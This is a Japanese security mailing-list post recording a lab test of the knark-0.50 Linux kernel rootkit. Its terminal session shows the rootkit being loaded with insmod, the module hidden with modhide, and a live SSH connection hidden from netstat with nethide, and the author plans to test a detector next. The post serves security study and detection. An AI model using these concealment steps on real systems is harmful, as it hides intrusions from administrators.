[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[port139:00531] Re: rootkit に関するメモ β1

ダンナ@サポセンです。

夏休み自由研究でknark-0.50を実験してみて、ちょっと訂正です。

リブート時とかに再度読み込ませたければ、何らかのファイルに変更
を加えなければならないので、単にrootkitを仕込むだけなら、別に
ファイルに変更は加えませんね。

単に仕込むには insmod knark.o ってコマンドラインで打ち込めばカ
ーネルには常駐し、/proc/knarkに隠しディレクトリを作成します。

以下はちょっといじった風景。良く動くもんです。続いて、detector
を試してみます。

[root@decoy knark-0.50]# ls
Makefile  README  ered  hidef  knark.o  modhide.o  nethide  rootme  src
[root@decoy knark-0.50]# insmod knark.o
[root@decoy knark-0.50]# cd /proc
[root@decoy /proc]# ls
1    298  342  5    cmdline      fs          ksyms    modules     scsi      tty
2    3    344  603  cpuinfo      ide         loadavg  mounts      self      uptime
252  338  367  605  devices      interrupts  locks    net         slabinfo  version
263  339  368  622  dma          ioports     mdstat   partitions  stat
277  340  369  apm  fb           kcore       meminfo  pci         swaps
291  341  4    bus  filesystems  kmsg        misc     rtc         sys
[root@decoy /proc]# cd knark
[root@decoy knark]# ls -al
total 0
dr-xr-xr-x   1 root     root            0 Aug 14 15:11 .
dr-xr-xr-x  31 root     root            0 Aug 14  2001 ..
-r--r--r--   1 root     root            0 Aug 14 15:11 Creed
-r--r--r--   1 root     root            0 Aug 14 15:11 files
-r--r--r--   1 root     root            0 Aug 14 15:11 nethides
-r--r--r--   1 root     root            0 Aug 14 15:11 pids
-r--r--r--   1 root     root            0 Aug 14 15:11 redirects

[root@decoy knark]# lsmod
Module                  Size  Used by
knark                   5944   0  (unused)
3c509                   5812   1  (autoclean)
[root@decoy knark]# cd /hogehoge/knark-0.50
[root@decoy knark-0.50]# insmod modhide.o
modhide.o: init_module: Device or resource busy
[root@decoy knark-0.50]# lsmod
Module                  Size  Used by
3c509                   5812   1  (autoclean)

[root@decoy knark-0.50]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0     20 decoy.brain.riken.g:ssh phantom.brain.riken:647 ESTABLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     114    @00000010
unix  1      [ ]         STREAM     CONNECTED     375    @00000016
unix  1      [ ]         STREAM     CONNECTED     376    /dev/log
[root@decoy knark-0.50]# cat /proc/net/tcp
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 8BAFA086:0016 02A6A086:0287 01 00000014:00000000 01:00000023 00000000     0        0 545
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 446
   2: 00000000:000F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 418
   3: 00000000:000B 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 417
   4: 00000000:07D3 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 416
   5: 00000000:004F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 415
   6: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 414

[root@decoy knark-0.50]# ./nethide "8BAFA086:0016"

        nethide.c by Creed @ #hack.se 1999 <creed@xxxxxxxxxx>

Done: "8BAFA086:0016" is now removed
[root@decoy knark-0.50]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  0      [ ]         STREAM     CONNECTED     114    @00000010
unix  1      [ ]         STREAM     CONNECTED     375    @00000016
unix  1      [ ]         STREAM     CONNECTED     376    /dev/log
[root@decoy knark-0.50]#

+----------------------------------------+
+    DANNA @ SAPOSEN
+  e-mail : danna@xxxxxxxxxxx
+  web site : http://www.hawkeye.ac/micky
+  Security Stadium
+  http://sec-stadium.hawkeye.ac/
+----------------------------------------+